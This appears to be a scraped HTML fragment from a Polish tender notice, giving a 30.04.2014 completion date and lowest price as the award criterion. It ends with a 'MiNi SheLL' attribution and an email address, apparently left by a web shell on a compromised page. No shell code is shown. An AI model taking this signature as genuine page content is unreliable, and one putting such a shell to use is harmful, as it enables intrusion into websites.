<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com